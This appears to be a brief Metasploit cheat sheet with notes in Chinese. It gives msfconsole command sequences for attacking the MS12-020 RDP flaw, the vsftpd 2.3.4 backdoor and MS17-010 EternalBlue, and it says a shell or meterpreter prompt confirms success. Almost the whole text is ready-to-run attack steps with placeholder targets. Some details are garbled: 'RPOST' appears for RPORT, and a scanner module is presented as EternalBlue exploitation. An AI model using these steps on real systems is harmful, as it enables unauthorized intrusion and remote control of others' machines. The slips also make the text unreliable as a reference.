msfconsole vulnerability detection
Article directory
MS12-020 Remote Desktop Vulnerability - Blue Screen
msf6 > search ms12-020
msf6 > use 0
msf6 auxiliary(scanner/rdp/ms12_020_check) > set RHOST XXXX
msf6 auxiliary(scanner/rdp/ms12_020_check) > set RPORT XXXX
msf6 auxiliary(scanner/rdp/ms12_020_check) > run
exploit
vsftpd 2.3.4 backdoor exploit CVE-2011-2523
msf6 > search vsftpd
msf6 > use 0 or 1...
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST XXXXX
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RPOST XXXXX
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
空白地方输入linux命令看是否可以
pwd ls ifconfig 等等命令,如果可以,证明攻击成功
MS17-010 EternalBlue Vulnerability Exploitation
msf6 > search ms17-010
msf6 > use 0 or 1...
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOST XXXXX
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RPOST XXXXX
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
攻击成功命令行变成:
meterpreter >
或者cmd样式